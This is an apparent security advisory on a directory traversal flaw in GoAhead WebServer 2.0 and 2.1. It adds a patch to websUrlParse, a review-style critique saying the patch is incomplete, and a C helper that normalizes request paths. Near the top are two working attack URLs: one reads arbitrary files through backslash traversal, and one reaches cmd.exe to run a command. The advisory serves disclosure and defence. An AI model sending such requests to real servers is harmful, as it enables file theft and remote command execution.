Hello!

We have found a bug in the GoAhead WebServer, v.2.0 and v.2.1.

An attacker can retrieve any file from the drive on which the web server is installed.

Try the following request:

http://www.somehost.com/..\..\..\..\..\..\autoexec.bat

This vulnerability may allow an attacker to execute code with the
privileges of the GoAhead process (Administrator? or root?):

http://www.somehost.com/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\


Patch for this vulnerability:


in file: url.c
in function websUrlParse(...)

int websUrlParse(char_t *url, char_t **pbuf, char_t **phost, char_t **ppath,
        char_t **pport, char_t **pquery, char_t **pproto, char_t **ptag,
        char_t **pext)
{
        char_t          *tok, *cp, *host, *path, *port, *proto, *tag, *query, *ext, 
*slash;
        char_t          *last_delim, *hostbuf, *portbuf, *buf;
        int                     c, len, ulen;

        a_assert(url);
        a_assert(pbuf);

        ulen = gstrlen(url);

/*
 *      Deny directory traversal vulnerability
 */

        while((slash = strchr(url, '\\')) != NULL) {
                        *slash = '/';
        }

/*
 *      We allocate enough to store separate hostname and port number fields.
 *      As there are 3 strings in the one buffer, we need room for 3 null chars.
 *      We allocate MAX_PORT_LEN char_t's for the port number.
 */
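
Review bot: the new loop in websUrlParse() runs over the whole of url before it is split, so backslashes after the '?' are rewritten too and a query string that legitimately carries one reaches the handler altered; limit the conversion to the path part, for example by stopping at the first '?'. The loop also calls strchr() on a char_t buffer while the line just above uses gstrlen(), so it should use the matching g-prefixed wrapper to stay correct in builds where char_t is not char. Restarting the search from url on every pass rescans the prefix each time; continuing from slash + 1 avoids that. Finally, the change only converts separators: the actual refusal of ".." segments has to happen in code that is not shown here, and a comment saying which check this relies on would make that dependency clear.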



--
Sergey Nenashev <[EMAIL PROTECTED]>
Yevgeny V.Yourkhov  <[EMAIL PROTECTED]>
Security Administrator Team
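
The requests above work because the backslash is accepted as a path separator by the file system but was not treated as one by the server's URL checks. The following is an added example, not GoAhead code and not part of the patch above: a hypothetical helper, normalize_request_path(), that treats both separators alike, resolves dot segments, and rejects any path that would climb above the document root. It assumes the path has already been percent-decoded and the query string split off.

```c
#include <string.h>

/* Hypothetical helper (not from GoAhead): normalize a request path in place.
 * Both '/' and '\\' count as separators; "." and empty segments are dropped;
 * ".." removes the previous segment. Returns 0 on success, -1 if the path is
 * not absolute or if ".." would climb above the document root. */
int normalize_request_path(char *path)
{
    char *src = path, *dst = path;

    if (path == NULL || (*path != '/' && *path != '\\'))
        return -1;                      /* must start at the web root */

    while (*src) {
        char *seg;
        size_t n;

        while (*src == '/' || *src == '\\')
            src++;                      /* skip a run of separators */
        seg = src;
        while (*src && *src != '/' && *src != '\\')
            src++;                      /* find the end of this segment */
        n = (size_t)(src - seg);

        if (n == 0 || (n == 1 && seg[0] == '.'))
            continue;                   /* empty or "." segment: ignore */
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            if (dst == path)
                return -1;              /* ".." at the root: reject request */
            while (dst > path && *--dst != '/')
                ;                       /* pop the previous segment */
            continue;
        }
        *dst++ = '/';                   /* emit "/segment"; output never */
        memmove(dst, seg, n);           /* overtakes input, ranges may overlap */
        dst += n;
    }
    if (dst == path)
        *dst++ = '/';                   /* everything cancelled out: root */
    *dst = '\0';
    return 0;
}
```

A caller would refuse the request when the function returns -1 and only then append the normalized path to the document root.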
